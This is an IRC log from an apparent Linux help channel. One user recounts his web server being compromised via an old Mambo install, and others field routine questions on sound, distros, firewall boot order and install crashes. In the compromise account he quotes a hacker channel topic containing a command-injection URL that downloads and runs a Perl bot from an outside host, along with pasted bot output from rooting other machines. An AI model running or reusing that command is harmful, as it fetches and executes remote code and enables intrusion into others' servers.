Comments:
<0> maybe it was a dcc server
<0> am at hackers irc channel
<0> * Topic is '!say @google 5000 http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%20http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*'
<1> |Trail|: it's a perl script for irc connection
<0> nice
<0> but still dont know if im actually rooted
<0> i think and hope , not.. have no proof
<0> if i was hacked.. the dude would be deleting my drive or at least his logs..
<2> oi
<0> am tracing for an hour..
<0> many clues
<0> maybe i was too fast.. he had 3 processes running.. ptrace..
<0> lol norton antivirus on this windows does not like the zip i made of his files
<0> calls it linux root tool something
<0> lets catch it again.. will study it at nav center
<0> need to know which kernels etc
<0> Virus name: Linux.RST.B
<0> Infected files have their date and time stamps changed to the moment the infection occurs.
<0> wow my first linux virus
<0> The virus is making use of anti-debugging techniques to make disassembly harder.
<0> AHA
<0> When a package send by attackers is received, the virus creates a connection and attackers can abuse a remote shell.
<0> how would such a packet arrive ? not only by http ?
<0> so i better shutdown ?
<0> Note that the virus doesn't make use of a vulnerability to gain higher permissions like root rights so the infection will not be successful for regular users.
<0> yeah just apache which is basically all important for me :(
<3> Still talking to yourself?
<0> jups :0
<0> The system is going down for system halt NOW!
<0> found remote connections to 6669.. irc.. means.. i dont see the daemon but its running..
<0> datacenter can fix this tomorrow
<0> oh fun.. now my home draytek router is mailing me about a portscan.. guess im attracting interest being in the hacker channel lol
<4> hi |Trail|
<4> i have a problem
<4> i can`t hear any sound
<5> zainga need more info than that, like are you deaf, are ya using alsa, etc..etc..
<4> i just install linux
<0> lol
<4> how can i know if i use alsa or anything
<5> what flavour of linux zainga?
<4> flavour?
<5> !distro
<6> A distro is, perhaps, one of the following: CentOS, Debian, Gentoo, LFS, Mandrake, Red Hat/Fedora, Slackware and SuSE (in alphabetical order), but can be something else too. a "Distribution"
<4> oh
<4> SuSE
<5> no idea about Suse i believe it uses something called Yast
<4> so what flavour of linux scot ?
<4> that u use now
<5> debian
<4> where can i download?
<5> debian.org
<4> debian is the best?
<5> no idea, i used it first, and just prefer it over the others i tried later
<4> what is the best part of debian?
<5> learning to use it
<4> what do u run on it?
<7> right
<7> im down to 2 nicks now
<5> database ircd and a few other meaningless things
<7> ones upstairs i believe
<4> ircd is for?
<5> testing
<4> BennyBoy what are u talking about?
<0> talking to the hackers.. they are pretty ok
<0> well.. for hackers..
<5> scuzz buckets
<7> sorry
<7> wrong channel
<7> lol
<0> am sitting there in the hacker channel and they show me how they root boxes.. they have done several now.. im witnessing this.. amazing.. they command the machines through irc..
<0> <ninja> [+] gate modified ( 0xffec8995 0x0804ec00 )
<0> <ninja> [+] exploited, uid=0
<0> <ninja> [sh]# backdooring started on apis.cepeline.net
<0> <ninja> [sh]# checking for remote logging... guess not.
<0> <ninja> [sh]# checking for tripwire... guess not.
<0> <ninja> [sh]# [Installing trojans....]
<0> <ninja> [sh]# [System Information...]
<8> it's not amazing
<0> <ninja> [sh]# Hostname : apis.cepeline.net (212.62.59.197)
<8> it's bloody trivial
<0> :(
<8> seriously
<0> they do .. boxes.. in seconds..
<0> scriptkiddos
<0> but seeing it happen
<0> so nicely on irc..
<8> ./root_lots_of_machines.sh, generally written by somebody with slightly more clue than the people running it
<0> outputted
<0> is amazing
<8> who should frankly be ashamed of themselves
<0> thats what they did to me
<0> but my kernel was patched
<0> they did not do much
<0> but im looking at so many boxes
<0> 500+
<8> |Trail|: Yes, well lots of people running linux are like you in this respect...
<0> <ninja> just gonna adduser with admin rights
<8> |Trail|: ie, they don't patch.
<8> |Trail|: reinstall; I'm guaranteeing you these ****wits can't be trusted.
<8> |Trail|: then learn how to secure your machine properly
<0> i AM patched
<0> im not sure what ELF is
<0> but they unleashed a virus contaminating eLF libs
<0> they did not touch other files.. they installed a backdoor but that failed too.. no root.. that part failed..
<0> the virus executed as user apache
<9> how many packing systems are there? I know of RPM (obviously), but got asked in an interview the other day. I think Debian has its own, but not sure if that's 'official'
<0> tried to find 'elf' files
<0> dunno what that is even
<10> |Trail|: what are they exploiting?
<0> ma box :)
<0> shut it down till morning
<10> no no what piece of software?
<0> datacenter needs to reinstall it
<0> an old and forgotten mambo install
<9> anyone know of other packaging systems other than RPM?
<11> I sent something to the trash when I was using konqueror as root, how can i permanently delete it?
<12> expr 365 * 24 doesn't work
<12> go into the trash and delete it
<13> Hello, when booting a system what number should the script in /etc/rc?.d/ that brings up the firewall be?
<14> depends on the distro
<14> debian would be 2, redhat style would be 3 and 5
<14> then 2
<14> thats generally the startup level for debian
<13> Ah -- I was more after something like: S19firewall
<14> well thats not rc?.d hehe
<14> after networking before other daemons like apache and such is a good place
<13> just before, you mean...
<14> you want it after networking has started
<14> otherwise iptables could act funky cause networking wasn't up, particularly if firewall specified eth devices
<13> I think iptables is ok if you try using non-existent interfaces -- lemme just check...
<13> home:~# iptables -A INPUT -i meow -j ACCEPT
<13> home:~# iptables -L -v -n -x | grep meow
<13> 0 0 ACCEPT all -- meow * 0.0.0.0/0 0.0.0.0/0
<14> i'm just cautious like that
<13> Thanks for help, Redragon.
<13> Night!
<16> please, just installed slackware in notepad-hp-pavillion ze2210, tried installing debian but i get a segmentation fault and hang even at first boot , tried 2.4 and 2.6 kernel installation... any clue ?
<17> your question doesn't make sense... what does debian have to do with slackware?
<16> synic , i mean.. i want to install debian.. i installed slackware in a smaller partition just to connect internet
<16> but at the first boot i hangs
<16> it
<17> what iso did you use to install debian?
<16> netinst
<16> i also tried sarg 3.0r1 disk 1
<16> have the same problem
<17> so you got it installed... but now when you boot you get a segfault?
<16> yep.. it installs ok.. when it says it will reboot, it hangs with the segfault msg...
<17> what does it say before that?